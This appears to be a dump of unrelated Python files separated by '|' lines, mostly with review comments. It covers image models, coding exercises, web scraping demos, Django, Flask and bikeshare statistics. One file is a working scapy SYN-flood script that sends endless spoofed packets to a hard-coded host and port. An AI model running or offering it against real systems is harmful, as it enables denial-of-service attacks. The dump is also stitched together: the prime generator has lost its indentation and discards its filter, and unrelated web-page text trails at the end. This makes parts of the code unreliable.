# CUDA_VISIBLE_DEVICES
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"  # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "0"  # restrict to the first GPU
# Parse options
# NOTE(review): options are parsed at import time (outside the __main__
# guard), so importing this module consumes sys.argv -- confirm intended.
opt = TestOptions().parse()
if __name__ == '__main__':
    # pix2pix model
    model = Pix2PixModel()
    model.initialize(opt)
    # NOTE(review): transforms.Scale is the legacy name for transforms.Resize;
    # kept to match whatever torchvision version this repo pins.
    dataset = PepeLoader(
        opt.dataroot,
        transform=transforms.Compose(
            [transforms.Scale(opt.loadSize),
             transforms.RandomCrop(opt.fineSize),
             transforms.ToTensor(),
             transforms.Normalize((0.5, 0.5, 0.5),
                                  (0.5, 0.5, 0.5))
             ]
        ),
        train=False
    )
    dataloader = torch.utils.data.DataLoader(
        dataset, batch_size=1, shuffle=True, pin_memory=True
    )
    # Hoisted out of the loop: the directory only needs creating once.
    utils.mkdir('results')
    for idx, data in enumerate(tqdm(dataloader)):
        # NOTE(review): '>' processes how_many + 1 samples; '>=' may be intended.
        if idx > opt.how_many:
            break
        model.set_input({
            'A': data[0],
            'B': data[1]
        })
        model.test()
        visuals = model.get_current_visuals()
        # Plot real A / fake B / real B stacked vertically.
        f, (ax1, ax2, ax3) = plt.subplots(
            3, 1, sharey='row'
        )
        ax1.imshow(visuals['real_A'])
        ax1.set_title('real A')
        ax2.imshow(visuals['fake_B'])
        ax2.set_title('fake B')
        ax3.imshow(visuals['real_B'])
        ax3.set_title('real B')
        # BUG FIX: include the batch index in the file name -- multiple batches
        # finish within the same second, so int(time.time()) alone silently
        # overwrote earlier results.
        f.savefig('results/{}_{}.png'.format(int(time.time()), idx))
        # BUG FIX: close the figure; matplotlib keeps every open figure alive,
        # so memory grew with the number of batches.
        plt.close(f)
|
'''
There is a new mobile game that starts with consecutively numbered clouds. Some of the clouds are thunderheads and others are cumulus. The player can jump on any cumulus cloud having a number that is equal to the number of the current cloud plus 1 or plus 2. The player must avoid the thunderheads. Determine the minimum number of jumps it will take to jump from the starting position to the last cloud. It is always possible to win the game.
For each game, you will get an array of clouds numbered 0 if they are safe or 1 if they must be avoided.
7, 0 0 1 0 0 1 0 : 4
6, 0 0 0 1 0 0 : 3
'''
def jumpingOnClouds(c):
    """Return the minimum number of jumps to reach the last cloud.

    c is a list of 0 (safe cumulus) / 1 (thunderhead) clouds; each jump moves
    +1 or +2 positions and must land on a 0. The input is assumed solvable
    (start and end are 0, no two adjacent 1s). Also prints the jump count,
    matching the original behaviour.
    """
    n = len(c)
    if n < 2:
        return 0
    # BUG FIX/cleanup: the old version drove a 'for x in range(n)' loop and
    # immediately overwrote the index with a separate 'step' cursor; a while
    # loop over the position expresses the same greedy walk directly.
    jumps = 0
    pos = 0
    while pos < n - 1:
        # Greedy: taking a 2-jump whenever it lands on a safe cloud is optimal.
        if pos + 2 < n and c[pos + 2] == 0:
            pos += 2
        else:
            pos += 1
        jumps += 1
    print(jumps)
    return jumps
# Sample runs from the problem statement (expected minimum jumps: 4 and 3).
jumpingOnClouds([0, 0, 1, 0, 0, 1, 0])
jumpingOnClouds([0,0,0,1,0,0])
# Written by Sarika Azad(5172690) for COMP9021
from linked_list_adt import *
class ExtendedLinkedList(LinkedList):
    """LinkedList extension whose rearrange() repeatedly swaps adjacent
    (even, odd) node pairs -- a bubble-style pass repeated until a full pass
    makes no swap."""
    def __init__(self, L = None):
        # Delegate construction entirely to the base LinkedList.
        super().__init__(L)
    def rearrange(self):
        """Rearrange nodes in place so odd values bubble ahead of the even
        values they follow; returns self. Uses ValueError internally as the
        'no swaps in a full pass' exit signal."""
        # Special-case the head pair: if head is even and its successor odd,
        # swap the first two nodes.
        value_1 = self.head.value
        value_2 = self.head.next_node.value
        if value_2 % 2 == 1 and value_1 % 2 ==0:
            node = self.head.next_node
            next_node = node.next_node
            node.next_node = self.head
            self.head = node
            node.next_node.next_node = next_node
        try:
            while True:
                node = self.head
                # counter tracks remaining pairs; it is decremented on each
                # swap, so an untouched counter means the pass was swap-free.
                counter=len(self)-1
                for i in range(1,len(self)):
                    try:
                        # n1/n2 are the adjacent pair after 'node'.
                        n1 = node.next_node
                        value_1 = n1.value
                        n2 = n1.next_node
                        value_2 = n2.value
                        n1 = node.next_node
                        value_1 = n1.value
                    except AttributeError:
                        # Ran off the end of the list; no pair to compare.
                        value_2 = None
                        value_1 = None
                    try:
                        # n3 is the node following the pair, used to relink.
                        n3 = n2.next_node
                    except AttributeError:
                        # NOTE(review): only value_3 is reset here (and never
                        # read); n3 keeps a stale value from a previous
                        # iteration -- confirm this is intended.
                        value_3 = None
                    if value_1 and value_2 and value_2 % 2 == 1 and value_1 % 2 ==0:
                        if value_2 != None:
                            # Swap the adjacent pair: node -> n2 -> n1 -> n3.
                            n2.next_node = None
                            n1.next_node = n3
                            node.next_node = n2
                            n2.next_node = n1
                            counter+= -1
                    node = node.next_node
                if counter == len(self)-1:
                    # No swaps during this pass: rearrangement is complete.
                    raise ValueError
        except ValueError:
            pass
        return self
|
from .meta import Meta
class Module(Meta):
    """Meta subclass; currently identical to Meta (presumably a placeholder
    for module-specific behaviour -- TODO confirm)."""
    pass
|
#!/usr/bin/env python
#Adding the necessary libraries to parse files, alter system files, and upload to drive
import argparse, os
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
#Parses for necessary arguments of filename and folder location within documents
#Parses for necessary arguments of filename and folder location within documents
parser = argparse.ArgumentParser()
parser.add_argument("-N", "--name", required=True)
parser.add_argument("-P", "--path")
parser.add_argument("-F", "--filetype")
parser.add_argument("-T", "--template")
#Creates a dictionary of the inputs with the --___ corresponding to the key
args = vars(parser.parse_args())
# Fall back to defaults when the optional flags are omitted.
if args['path'] is None:
    args['path'] = 'Math'
#if args['filetype'] == None:
#    args['filetype'] = '.tex'
if args['template'] is None:
    args['template'] = '/home/amanshah/.vim/bundle/vim-latex/ftplugin/latex-suite/templates/homework.tex'
#File creation in the local system
filedir = '/home/amanshah/Documents/%s/%s' % (args['path'], args['name'])
# NOTE(review): slicing off the final 4 characters assumes --name carries a
# 4-character extension such as '.tex'; confirm callers always pass one.
target_dir = filedir[:len(filedir) - 4]
# BUG FIX: the old code tested os.path.exists(filedir) -- the path *with* the
# extension -- before creating target_dir, so an existing directory could
# still hit makedirs and raise. exist_ok makes creation idempotent.
os.makedirs(target_dir, exist_ok=True)
file_loc = target_dir + '/' + args['name']
# Copy the LaTeX template into the new file; the with-statement closes both
# handles (the old explicit close() calls were redundant).
with open(file_loc, 'w+') as f, open(args['template']) as template_file:
    for line in template_file:
        f.write(line)
#Google Account Authorization using .json file in the same directory as this file
gauth = GoogleAuth()
gauth.LocalWebserverAuth()
drive = GoogleDrive(gauth)
#File Uploading to drive and content addition
uploaded = drive.CreateFile({'title': args['name']})
uploaded.SetContentFile(file_loc)
uploaded.Upload()
|
# Demo of BeautifulSoup tag navigation against a small fixed document.
html_doc = """
<html><head><title>The Dormouse's story</title></head>
<body>
<p class="title"><b>The Dormouse's story</b></p>
<p class="story">Once upon a time there were three little sisters; and their names were
<a href="http://example.com/elsie" class="sister" id="link1">Elsie</a>,
<a href="http://example.com/lacie" class="sister" id="link2">Lacie</a> and
<a href="http://example.com/tillie" class="sister" id="link3">Tillie</a>;
and they lived at the bottom of a well.</p>
<p class="story">...</p>
"""
from bs4 import BeautifulSoup
soup = BeautifulSoup(html_doc, 'html.parser')
# Get the <head> tag
print(soup.head)
print(soup.title)
# Get the first <b> tag inside the <body> tag
print(soup.body.b)
# Get the first tag with the given name
print(soup.a)
# All <a> tags
print(soup.find_all("a"))
# A tag's .contents attribute lists its child nodes
head_tag = soup.head
print(head_tag)
print(head_tag.contents)
title_tag = head_tag.contents[0]
print(title_tag)
print(title_tag.contents)
# The BeautifulSoup object itself has children: the <html> tag is a child of it
print(len(soup.contents))
print(soup.contents[0].name)
# text = title_tag.contents[0]
# print(text.contents)
# Iterate a tag's direct children with the .children generator
for child in title_tag.children:
    print(child)
# .descendants recursively iterates all of a tag's descendants
for child in head_tag.descendants:
    print(child)
print(len(list(soup.children)))
print(len(list(soup.descendants)))
print(title_tag.string)
print(head_tag.string)
# When a tag contains multiple strings, use .strings to loop over them
# (this also yields the whitespace/blank strings between tags)
for string in soup.strings:
    print(repr(string))
# .stripped_strings skips the extra whitespace-only strings
for string in soup.stripped_strings:
    print(repr(string))
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def odd_iter():
n = 1
while True:
n = n + 2
yield n
def _not_divisible(n):
return lambda x: x%n > 0
def outputPrime():
#The first number is 2:
yield 2
initial = odd_iter()
while True:
n = next(initial)
yield n
ini = filter(_not_divisible(n),initial)
# Print every prime below 20 using the generator above.
for n in outputPrime():
    if n < 20:
        print (n)
    else:
        break
|
from scapy.all import *
from scapy.layers.inet import *
# scapy
def tcp_syn():
    """Send an endless stream of TCP SYN packets to a hard-coded target.

    NOTE(review): this is a SYN-flood tool — it spoofs random source IPs
    and loops forever. Only run it against hosts you are authorized to test.
    """
    target_ip = "192.168.106.3"
    target_port = 9000
    # Random spoofed source IP and ephemeral source port per packet.
    ip = IP(src=RandIP(), dst=target_ip)
    tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
    raw = Raw(b"X"*1024)
    p = ip / tcp / raw
    # loop=1 resends indefinitely; verbose=0 suppresses per-packet output.
    send(p, loop=1, verbose=0)

if __name__ == '__main__':
    tcp_syn()
|
# Grid-search the Minkowski power parameter ``p`` for a distance-weighted
# 5-NN regressor on the Boston housing data, scored by 5-fold CV (neg MSE).
# Fixes: the original discarded the result of scale(), so the model was
# evaluated on UNSCALED features; also removed a stray '|' token that
# broke parsing at the end of the file.
# NOTE(review): load_boston was removed in scikit-learn 1.2 — TODO migrate
# to an alternative dataset when upgrading.
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import KFold
from sklearn.datasets import load_boston
from sklearn.preprocessing import scale
import numpy as np
from sklearn.model_selection import cross_val_score
import pandas as pn

data = load_boston()
X = scale(data.data)  # keep the scaled feature matrix (was thrown away)
cv = KFold(n_splits=5, shuffle=True, random_state=42)
p_grid = np.linspace(start=1, stop=10, num=200)
acc = list()
for p in p_grid:
    neigh = KNeighborsRegressor(n_neighbors=5, weights='distance', p=p)
    acc.append(cross_val_score(neigh, X, data.target, cv=cv,
                               scoring='neg_mean_squared_error').mean())
# Best (least negative) score first.
print(pn.DataFrame({'acc': acc, 'p': p_grid}).sort_values(by=['acc'], ascending=False))
import cv2
import numpy as np
import json
import os
import pandas as pd
# 실습 1
# face_cascade = cv2.CascadeClassifier('../0706_data/haarcascade_frontalface_default.xml')
#
# img = cv2.imread('../0706_data/face.jpg')
# gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#
# faces = face_cascade.detectMultiScale(gray, 1.3, 1)
#
# print(faces)
#
# _list = list(faces)
# cnt = 0
# while _list:
# x_pos = []
# y_pos = []
# for idx in _list:
# for j in range(len(idx)):
# if j < 2:
# x_pos.append(idx[j])
# else:
# y_pos.append(idx[j])
# img = cv2.rectangle(img, (x_pos[0], x_pos[1]), (x_pos[0]+y_pos[0],x_pos[1]+y_pos[1]), (0, 255, 0), 3)
# cnt += 1
# print(cnt, idx)
# _list.pop(0)
# break
#
#
#
#
# img = cv2.rectangle(img,(5,20),(69,69),(0,255,0),3)
# cv2.imshow('',img)
# cv2.waitKey()
#
# Exercise 2: pad an image to 500x500 and run Haar-cascade face detection.
img = cv2.imread('../0706_data/test_img3.jpg')
print(img.shape)
height = img.shape[0]
width = img.shape[1]
# Border sizes that centre the image inside a 500x500 canvas
# (assumes the source image is smaller than 500px each way — TODO confirm).
h = int((500-height)/2)
w = int((500-width)/2)
# top/bottom/left/right borders; centre the image, pad with black.
# NOTE(review): ``cv2.cv2`` resolves in opencv-python wheels but plain
# ``cv2.copyMakeBorder`` is the conventional spelling — verify.
img_pad = cv2.cv2.copyMakeBorder(img,h,h,w,w,cv2.BORDER_CONSTANT, value=[0,0,0])
print (img_pad.shape)
cv2.imshow('img pad',img_pad)
cv2.waitKey()
pad_cas = cv2.CascadeClassifier('../0706_data/haarcascade_frontalface_default.xml')
gray = cv2.cvtColor(img_pad, cv2.COLOR_BGR2GRAY)
faces = pad_cas.detectMultiScale(gray, 1.3, 1)
print(faces)
# Convert each detection into {'object': 'personN', 'box': [x, y, w, h]}.
# NOTE(review): the while/for/break combination handles exactly one
# detection per outer iteration — equivalent to a plain for loop.
_list = list(faces)
cnt = 0
dicli = []
while _list:
    _dict = {}
    for idx in _list:
        _dict['object'] = 'person{}'.format(cnt)
        _dict['box'] = list(idx)
        dicli.append(_dict)
        _list.pop(0)
        cnt += 1
        break
print(dicli)
#
#
# # 실습 3
#
#
# img = cv2.imread('../0706_data/test_img3.jpg')
#
# for dic in dicli:
# face_pos = dic['box']
# print(face_pos)
# img = cv2.cv2.copyMakeBorder(img,h,h,w,w,cv2.BORDER_CONSTANT, value=[0,0,0]) # top bottom left right , 중심에 놓겠다 , 검은색 패딩하겠다
#
# cv2.imshow('json to pad',img)
# cv2.waitKey() |
''' Utility methods for performing database operations '''
''' Trying to mimic a actual database server '''
import uuid

# In-memory stand-in for a "users" table. Every record carries a UUID
# string under "_id" plus first/last name and email fields.
users = [
    {
        "_id": "7a7f4f7f-19fb-4266-b1cf-666158cf17fb",
        "first_name":"Virat",
        "last_name": "Kohli",
        "email": "imvk@gmail.com"
    },
    {
        "_id": "e4dc6add-956e-4bc5-8122-047ef2ca42e3",
        "first_name":"Rohit",
        "last_name": "Sharma",
        "email": "hitman@gmail.com"
    },
    {
        "_id": "b6b66d84-6aff-4c7a-9897-775920e76787",
        "first_name":"Jasprit",
        "last_name": "Bumrah",
        "email": "boomboom@ggmail.com"
    },
    {
        "_id": "ae21491d-d7fc-498d-b2f9-5f6d015a62b8",
        "first_name":"Ajinkya",
        "last_name": "Rahane",
        "email": "merahane@gmail.com"
    }
]
def get_all_users():
    """Return the full list of user records (the live list, not a copy)."""
    return users
def get_user_by_id(user_id):
    """Return the first user record whose "_id" equals ``user_id``.

    Raises:
        Exception: if no record matches.
    """
    for record in users:
        if record["_id"] == user_id:
            return record
    raise Exception("Invalid User Id")
def add_user(user_details):
    """Store a new user built from ``user_details`` with a generated UUID id.

    Note: like the original, an "_id" key inside ``user_details`` would
    override the generated one (dict-spread ordering is preserved).
    """
    record = {"_id": str(uuid.uuid4()), **user_details}
    users.append(record)
    return record
def update_user(updated_details):
    """Apply ``updated_details`` to the stored user with the matching "_id".

    Fixes: the original deleted "_id" from the *caller's* dict (a surprising
    side effect, and it happened even when the lookup later failed) and used
    a manual index scan plus a redundant ``users[index] = user`` self-assignment.

    Raises:
        KeyError: if ``updated_details`` has no "_id" key (as before).
        Exception: if no stored user has the given id.
    """
    details = dict(updated_details)   # work on a copy; never mutate input
    user_id = details.pop("_id")      # KeyError if missing, same as before
    for user in users:
        if user["_id"] == user_id:
            user.update(details)      # in-place update of the stored record
            return user
    raise Exception("No user found with given Id")
|
# Exercise 09: count how many times each character occurs in a string.
# Example:
#   Input:  'Stringings'
#   Output: {'S': 1, 't': 1, 'r': 1, 'i': 2, 'n': 2, 'g': 2, 's': 1}
from collections import Counter

s = 'Stringings'
# One O(n) pass instead of calling s.count(c) per character (O(n^2)).
# dict(Counter) keeps first-occurrence key order, matching the original
# {c: s.count(c) for c in s} comprehension exactly.
my_dict = dict(Counter(s))
print(my_dict)
|
"""Deployment Services Classes."""
import logging
from .deployabledevices import DeployableDevices
from .deploymentrequests import DeploymentRequests
logging.debug("In the deployment_services __init__.py file.")
__all__ = ["DeployableDevices", "DeploymentRequests"]
|
# Generated by Django 3.1.4 on 2020-12-13 10:05
from django.conf import settings
from django.db import migrations, models


class Migration(migrations.Migration):
    """Alter FollowList.followings: add the 'followers' reverse accessor."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('Users', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='followlist',
            name='followings',
            field=models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-

# Maps a module's lookup key (lower case) to the class name it exports.
# Fix: removed a stray '|' token after the closing brace that made the
# module unparsable.
MY_MODULES = {
    'block': 'Block',
    'mblock': 'mBlock',
    'sinblock': 'sinBlock',
    'videostream': 'MjpegStream',
}
# -*- coding: utf-8 -*-
import test
import auto_encoder
import writer
import time

# NOTE(review): Python 2 script (print statement, xrange). The dump lost
# all indentation; the nesting below was reconstructed from statement
# order — verify against the original before relying on it.
if __name__=="__main__":
    alll = time.time()
    # number of items
    item = 1
    # input dimensionality
    num_input = 10000
    # units in hidden layer 1
    num_hidden = 100
    # number of training iterations
    iteration = 10
    # User id list, one id per line (trailing newline stripped with [:-1]).
    yy = open("../Rakuten-real-/userID150-165.csv")
    box = []
    for user in yy:
        box.append(user[:-1])
    #g2 = open("../rakutendb/item_vec_nmf150-165ver1.100_userID/matrix_ver2.csv")
    g2 = open("../../../Desktop/matrix_ver2.csv")
    mat = []
    for i in g2:
        mat.append(i[:-1])
    g2.close()
    # Map item code -> row index in the matrix file.
    dic = {}
    a = open("../Rakuten-real-/item_code150-165.csv")
    count = 0
    for u in a:
        dic[u[:-1]] = count
        count += 1
    a.close()
    # Process users 250..499 from the id list.
    for index in range(250,500):
        aa = []
        ra = []
        gg = open("../rakutendb/150-165/"+box[index]+".csv")
        for ii in gg:
            oo = ii[:-1].split(",")
            aa.append(oo[0] + "a")
            ra.append(oo[1])
        # Keep item codes that are not URLs.
        lis = []
        ij = 0
        for item_code in aa:
            if item_code[:-1].find("http") > -1:
                continue
            lis.append(item_code[:-1])
            ij += 1
        count = 0
        # Build input vectors; non-zero entries are binarised to 1.0
        # (val/val), zeros kept as 0.0.
        x = {}
        for i in xrange(len(lis)):
            g = open("../rakutendb/item_vec_bow150-165ver1.5/"+lis[i]+".csv")
            for vec in g:
                x[i] = []
                li = vec[:-1].split(",")
                for val in li:
                    if float(val) != 0:
                        x[i].append(float(val)/float(val))
                    else:
                        x[i].append(float(val))
                #vv = mat[dic[lis[i]]].split(",")
                #del vv[len(vv)-1]
                #for jj in vv:
                #    x[i].append(float(jj))
        # Train a denoising auto-encoder on this user's item vectors and
        # write the extracted representations to a per-user csv.
        neural = auto_encoder.NeuralNet(num_input,num_hidden,x,iteration,"Denoise")
        neural.run()
        wr = writer.csv("../rakutendb/item_vec_ae150-165ver1.100.7_userID/"+str(box[index]))
        for i in xrange(len(lis)):
            a = neural.extract(i)
            b = ""
            for j in xrange(len(a.data[0])):
                b += str(a.data[0][j]) + ","
            wr.write(b[:-1])
        #if j != len(lis)-1:
        #    wr.write("\n")
        #l1 = neural.extract_Hidden()
        #gg = open("./150-165/"+box[index]+"_Hidden.csv","w")
        #for value in l1:
        #for vbn in value:
        #gg.write(str(vbn)+"\n")
    print time.time() - alll
|
import win32com.client
import pythoncom
import Login as login


class XAQueryEvent:
    """Event sink for the eBEST xingAPI XA_DataSet.XAQuery COM object."""

    # Class-level flag: 0 until OnReceiveData fires, then 1. Being a class
    # attribute is what lets the COM event instance signal ProcT1102 below.
    query_state = 0

    def OnReceiveData(self, code):
        # Invoked by the COM event loop when the t1102 response arrives.
        XAQueryEvent.query_state = 1

    def ProcT1102(self):
        # NOTE(review): ``self`` is deliberately rebound to the COM dispatch
        # object, discarding the caller's instance — the method only works
        # because query_state lives on the class, not the instance.
        self = win32com.client.DispatchWithEvents("XA_DataSet.XAQuery", XAQueryEvent)
        self.ResFileName = "C:\\eBEST\\xingAPI\\Res\\t1102.res"
        self.SetFieldData("t1102InBlock", "shcode", 0, "078020")
        self.Request(0)
        # Pump COM messages until OnReceiveData flips the flag.
        while XAQueryEvent.query_state == 0:
            pythoncom.PumpWaitingMessages()
        name = self.GetFieldData("t1102OutBlock", "hname", 0)
        price = self.GetFieldData("t1102OutBlock", "price", 0)
        print(name)
        print(price)


if __name__ == "__main__":
    # Log in first, then request the t1102 quote.
    inXASession = login.XASessionEvents()
    inXASession.ProcLogin()
    inXAQuery = XAQueryEvent()
    inXAQuery.ProcT1102()
|
from flask import render_template
from flask_login import current_user
from util.logutils import loghelpers
import logging
logger = logging.getLogger(__name__)
@loghelpers.log_decorator()
def about():
    """Render the static "about" page.

    Fix: removed a stray '|' token after the return statement that made
    the module unparsable.
    """
    # logger.debug(f"{current_user=}")
    # logger.debug(f"{current_user.__dict__=}")
    return render_template(
        "about.html",
        # loggedin=current_user.is_authenticated
    )
from flask import Blueprint
from flask.json import jsonify
from ckanpackager.lib.utils import BadRequestError, NotAuthorizedError
error_handlers = Blueprint('error_handlers', __name__)
@error_handlers.app_errorhandler(BadRequestError)
def handle_bad_request(err):
    """Translate a BadRequestError into a 400 JSON response."""
    body = {
        'status': 'failed',
        'error': 'BadRequestError',
        'message': str(err),
    }
    response = jsonify(body)
    response.status_code = 400
    return response
@error_handlers.app_errorhandler(NotAuthorizedError)
def handle_not_authorized(err):
    """Translate a NotAuthorizedError into a 401 JSON response.

    Fix: removed a stray '|' token after the return statement that made
    the module unparsable.
    """
    response = jsonify({
        'status': 'failed',
        'error': 'NotAuthorizedError',
        'message': str(err)
    })
    response.status_code = 401
    return response
x = int(input("Enter a number"))
y = int(input("Enter a second number"))
# A right triangle needs two non-zero legs; otherwise scold the user.
if x and y:
    hypotenuse = (x ** 2 + y ** 2) ** 0.5
    print(hypotenuse)
else:
    print("PAY MORE ATTENTION")
|
from django.db import models
from django import forms
from django.forms import ModelForm, Textarea
from .models import Post


class PostForm(ModelForm):
    """Form for creating/editing a Post (title, text, image)."""

    class Meta:
        model = Post
        fields = ['title', 'text', 'image']
        # Blank labels on purpose: the UI relies on placeholders instead.
        labels = {
            'title': '',
            'text': '',
            'image': (''),
        }

    def __init__(self, *args, **kwargs):
        super(PostForm, self).__init__(*args, **kwargs)
        # Placeholder text is Russian for "Enter the article title".
        self.fields['title'].widget.attrs.update({
            'placeholder': 'Введите название статьи'
        })
import time
import pandas as pd
import numpy as np
# Maps each supported city (lower case) to its csv data file.
CITY_DATA = { 'chicago': 'chicago.csv',
              'new york city': 'new_york_city.csv',
              'washington': 'washington.csv' }
def get_filters():
    """
    Asks user to specify a city, month, and day to analyze.

    Returns:
        (str) city - name of the city to analyze
        (str) month - name of the month to filter by, or "All" to apply no month filter
        (str) day - name of the day of week to filter by, or "All" to apply no day filter

    Improvement: the three copy-pasted prompt/validate loops are collapsed
    into one helper; behavior (title-cased answers, re-prompt on invalid
    input) is unchanged.
    """
    print('Hello! Let\'s explore some US bikeshare data!')

    def _ask(prompt, valid):
        # Re-prompt until the stripped, title-cased answer is acceptable.
        answer = input(prompt).strip().title()
        while answer not in valid:
            print("invalid input, try again")
            answer = input(prompt).strip().title()
        return answer

    city = _ask("Enter the city name (Chicago or New york or Washington)\n",
                {"Chicago", "New York", "Washington"})
    month = _ask("Enter the month (all, january, february, ... , june). Type 'all' for no time filter\n",
                 {"All", "January", "February", "March", "April", "May", "June"})
    day = _ask("Enter the day of week (all, monday, tuesday, ... sunday). Type 'all' for no day filter\n",
               {"All", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday",
                "Saturday", "Sunday"})

    print("You chose the following: City:", city, "Month:", month, "Day:", day)
    print('-'*40)
    return city, month, day
def load_data(city, month, day):
    """
    Loads data for the specified city and filters by month and day if applicable.

    Args:
        (str) city - name of the city to analyze
        (str) month - name of the month to filter by, or "All" to apply no month filter
        (str) day - name of the day of week to filter by, or "All" to apply no day filter
    Returns:
        df - Pandas DataFrame containing city data filtered by month and day
    """
    # Resolve the city's csv file; anything that is not Chicago or
    # New York falls through to Washington (same as before).
    if city == 'Chicago':
        source = CITY_DATA['chicago']
    elif city == 'New York':
        source = CITY_DATA['new york city']
    else:
        source = CITY_DATA['washington']
    df = pd.read_csv(source)

    # Parse both timestamp columns, then derive the filter columns.
    for column in ('Start Time', 'End Time'):
        df[column] = pd.to_datetime(df[column])
    df['day'] = df['Start Time'].dt.day_name()
    df['month'] = df['Start Time'].dt.month_name()

    if month != 'All':
        df = df[df['month'] == month]
    if day != 'All':
        df = df[df['day'] == day]
    return df
def time_stats(df):
    """Displays statistics on the most frequent times of travel."""
    print('\nCalculating The Most Frequent Times of Travel...\n')
    t0 = time.time()

    # Month and day come straight from the pre-computed helper columns.
    print('Most common month:\n{} \n'.format(df['month'].mode()[0]))
    print('Most common day:\n{} \n'.format(df['day'].mode()[0]))

    # Derive the start hour on the fly (adds an 'hour' column, as before).
    df['hour'] = df['Start Time'].dt.hour
    print('Most common start hour:\n{} \n'.format(df['hour'].mode()[0]))

    print("\nThis took %s seconds." % (time.time() - t0))
    print('-' * 40)
def station_stats(df):
    """Displays statistics on the most popular stations and trip."""
    print('\nCalculating The Most Popular Stations and Trip...\n')
    t0 = time.time()

    print('Most commonly used start station:\n{} \n'.format(df['Start Station'].mode()[0]))
    print('Most commonly used end station:\n{} \n'.format(df['End Station'].mode()[0]))

    # Build the "start - To - end" pairing (adds a 'combination' column, as
    # before) and report its most frequent value.
    df['combination'] = df['Start Station'] + " - To - " + df['End Station']
    print('Most common frequent combination of start station and end station trip:\n{} \n'.format(df['combination'].mode()[0]))

    print("\nThis took %s seconds." % (time.time() - t0))
    print('-' * 40)
def trip_duration_stats(df):
    """Displays statistics on the total and average trip duration."""
    print('\nCalculating Trip Duration...\n')
    t0 = time.time()

    durations = df['Trip Duration']
    print('Total travel time:\n{} \n'.format(durations.sum()))
    print('Mean travel time:\n{} \n'.format(durations.mean()))
    print('Number of trips:\n{} \n'.format(durations.count()))

    print("\nThis took %s seconds." % (time.time() - t0))
    print('-' * 40)
def user_stats(df):
    """Displays statistics on bikeshare users.

    Robustness fix: the Washington dataset has no 'Gender' or 'Birth Year'
    columns, and a filtered frame may be missing a user type entirely —
    the original crashed with KeyError in both cases. Each section is now
    guarded and missing counts default to 0.
    """
    print('\nCalculating User Stats...\n')
    start_time = time.time()

    # Counts of user types (0 when a type is absent after filtering).
    type_counts = df['User Type'].value_counts()
    print('\nCounts of user types:\nSubscriber')
    print(type_counts.get('Subscriber', 0))
    print('\nCustomer:')
    print(type_counts.get('Customer', 0))

    if 'Gender' in df.columns:
        gender_counts = df['Gender'].value_counts()
        print('\nCounts of gender:\n')
        print('Male:')
        print(gender_counts.get('Male', 0))
        print('\nFemale:')
        print(gender_counts.get('Female', 0))
    else:
        print('\nNo gender data available for this city.')

    if 'Birth Year' in df.columns:
        print('Oldest year of birth : ', df['Birth Year'].min())
        print('\nNewest year of birth : ', df['Birth Year'].max())
        print('\nMost common year of birth : ', df['Birth Year'].mode()[0])
    else:
        print('\nNo birth year data available for this city.')

    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-' * 40)
def main():
    """Interactive driver: filter the data, page through raw rows, then
    print all four statistics sections; loop until the user declines.

    Fix: this function contained unresolved git merge-conflict markers
    ('||||||| merged common ancestors', '=======', '>>>>>>> refactoring')
    that made the file unparsable. Both conflicting sides were identical
    "(5 rows)" prompts, so the conflict is resolved by keeping one copy.
    """
    while True:
        city, month, day = get_filters()
        df = load_data(city, month, day)

        print('-' * 40)
        print('the data is ready to be viewed')
        print('-' * 40)

        # Page through the raw rows five at a time while the user says yes.
        user_raw_data = input("Do you want to see raw data (5 rows)? Enter : yes or no.\n").lower()
        start = 0
        end = 5
        while user_raw_data == "yes":
            print(df.iloc[start:end])
            start += 5
            end += 5
            user_raw_data = input("Do you still want to see more raw data (5 rows)? Enter : yes or no.\n").lower()

        time_stats(df)
        station_stats(df)
        trip_duration_stats(df)
        user_stats(df)

        restart = input('\nWould you like to restart? Enter yes or no.\n')
        if restart.lower() != 'yes':
            break


if __name__ == "__main__":
    main()
|
#!/usr/bin/env python3
import sys
def Hours():
    """Read a minute count from sys.argv[1] and print it as "H H, M M".

    Fixes:
      * A missing command-line argument previously raised an uncaught
        IndexError; it now prints a usage hint instead.
      * The negative-input message lived redundantly in both the raise
        and the handler; the handler is now its single source.
    """
    try:
        num = int(sys.argv[1])
        if num < 0:
            # Route negatives through the same handler as non-numeric input.
            raise ValueError
        h, m = divmod(num, 60)
        print("{} H, {} M".format(h, m))
    except IndexError:
        print('Usage: pass the number of minutes as the first argument')
    except ValueError:
        print('ValueError? Input number cannot be negative')


Hours()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.